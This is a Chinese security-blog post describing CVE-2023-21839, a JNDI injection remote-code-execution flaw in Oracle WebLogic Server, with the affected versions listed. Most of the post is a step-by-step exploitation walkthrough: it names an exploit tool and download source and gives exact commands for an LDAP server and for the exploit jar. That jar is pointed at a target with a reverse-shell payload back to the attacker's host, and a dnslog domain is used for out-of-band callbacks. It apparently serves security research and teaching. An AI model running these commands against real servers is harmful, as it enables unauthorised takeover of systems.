Weblogic-CVE-2023-21839 漏洞解析

admin 2024年5月12日15:35:41评论26 views字数 1066阅读3分33秒阅读模式

一、漏洞概述

RCE漏洞,该漏洞允许未经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管,通过rmi/ldap远程协议进行远程命令执行,,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,可能导致远程代码执行。

由此可见:CVE-2023-21839是一个weblogic的JNDI注入漏洞。

二、影响范围

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0

Oracle WebLogic Server 14.1.1.0.0

三、利用方式

反弹shell

一、启用http://your-ip:7001/console,可以看到登录界面

Weblogic-CVE-2023-21839 漏洞解析

下载漏洞利用工具

JNDIExploit-1.4-SNAPSHOT.jar

二、启动ladp服务,在kali上同时启动监听:

Weblogic-CVE-2023-21839 漏洞解析

vps上使用JNDIExploit开启ldap协议服务,这里注意 1389跟3456端口开放

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.111.14

Weblogic-CVE-2023-21839 漏洞解析

漏洞EXP下载:

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

三、启动EXP(注意:jdk版本仍需低版本,原装JDK17不必卸载,下载一个低版本的JDK之后,切换即可)

java -jar Weblogic-CVE-2023-21839.jar 192.168.111.6:7001 ldap://192.168.111.14:1389/Basic/ReverseShell/192.168.111.14/9999

java -jar 目标服务器ip地址:端口 ldap地址/Basic/ReverseShell/ldap服务器IP地址/nc监听端口

没有明显的变化

Weblogic-CVE-2023-21839 漏洞解析

四、查看LDAP服务器,成功获取

Weblogic-CVE-2023-21839 漏洞解析

Weblogic-CVE-2023-21839 漏洞解析

DNSlog流量外带

eg:java -jar Weblogic-CVE-2023-21839.jar 靶场ip:7001 ldap:// xxxxxx.dnslog.cn

java -jar Weblogic-CVE-2023-21839.jar 192.168.111.6:7001 ldap:// vqd5uu.dnslog.cn

Weblogic-CVE-2023-21839 漏洞解析

还可以利用工具实现。。。。

来源:https://www.freebuf.com/

原文始发于微信公众号(船山信安):Weblogic-CVE-2023-21839 漏洞解析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月12日15:35:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Weblogic-CVE-2023-21839 漏洞解析https://cn-sec.com/archives/2732027.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息